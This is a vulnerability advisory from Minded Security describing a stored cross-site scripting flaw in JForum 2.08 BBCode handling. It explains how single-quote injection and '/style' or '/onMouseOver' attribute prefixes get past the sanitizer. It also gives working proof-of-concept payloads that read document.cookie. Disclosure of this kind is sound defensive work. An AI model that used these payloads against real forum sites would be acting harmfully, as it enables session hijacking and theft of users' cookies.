Minded Security Labs: Advisory #MSA130510
JForum <= 2.08 is vulnerable to Stored Cross Site Scripting in BBCode.

Tested Versions: 
	JForum v. 2.08

        Discovery by 
        Giorgio Fedon of Minded Security
	giorgio.fedon [_at_] mindedsecurity.com


Minded Security Consultants discovered during a penetration testing activity that 
JForum <= 2.08 is vulnerable to Stored Cross Site Scripting.


BBcode configurations are loaded from "bb_config.xml" that contains
configurations for bbcode to HTML conversion.

JForum/src/net/jforum/util/bbcode/BBCodeHandler.java (lines 76 to 87)

    public BBCodeHandler() { } public BBCodeHandler parse() { try { SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); BBCodeHandler bbParser = new BBCodeHandler(); String path = SystemGlobals.getValue(ConfigKeys.CONFIG_DIR) + "/bb_config.xml"; ... 

Tag "[color=red]Text[/color]" is handled by the following lines of code:

    <!-- COLOR --> <match name="color" removeQuotes="true"> <regex>(?s)(?i)\[color=['"]?(.*?[^'"])['"]?\](.*?)\[/color\]</regex> <replace> <![CDATA[ <font color='$1'>$2</font> ]]> </replace> </match> 

As it's possible to see from the previous code, "color" attribute
expects a parameter between single quotes. Jforum does not encode single
quotes, so it's possible to add arbitrary attributes.

Before launching the attacks it's important to investigate other defense
in depth measures inside Jforum. These controls are handled by:

By analizing this class it's possible to see that characters "<", ">"
and " \" " are converted into HTML entities:

    if (text.indexOf('>') > -1 || text.indexOf('<') > -1) { StringBuffer tmp = new StringBuffer(text); ViewCommon.replaceAll(tmp, "<", "&lt;"); ViewCommon.replaceAll(tmp, ">", "&gt;"); ViewCommon.replaceAll(tmp, "\"", "&quot;"); node.setText(tmp.toString()); } } 

If Decimal or Hex Entities are used, these will be modified to not allow
auto decoding and javascript execution:

    if (a.getValue().indexOf("&#") > -1) { a.setValue(a.getValue().replaceAll("&#", "&amp;#")); 

If "Style" attribute contains a parenthesis this will lead to clearing
the attribute content:

    else if ("STYLE".equals(name)) { // It is much more a try to not allow constructions // like style="background-color: url(javascript:xxxx)" than anything else if (value.indexOf('(') > -1) { return false; } } 

From the code above an exact match against the attribute vector is
performed. If the attribute equals to "style" the sanitization step
takes place; unfortunately "/style" is still a valid attribute and
allows to bypass the exact match.

The same technique can be used to evade Jforum blacklist restrictions
for event handlers (es. onMouseOver, onMouseOut, etc.).

---- Proof Of Concept

Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):

    [color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color] 

Renders into the following HTML code:

    <font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font> 

Stored XSS - proof of concept for Internet Explorer ("style" cannot contain
parenthesis "(" ):

    [color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color] 

Renders into the following HTML code:

    <font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font> 

Disclosure Timeline

14-02-2010 Issue Discovered
25-02-2010 Reported to Vendor
13-05-2010 Public Disclosure


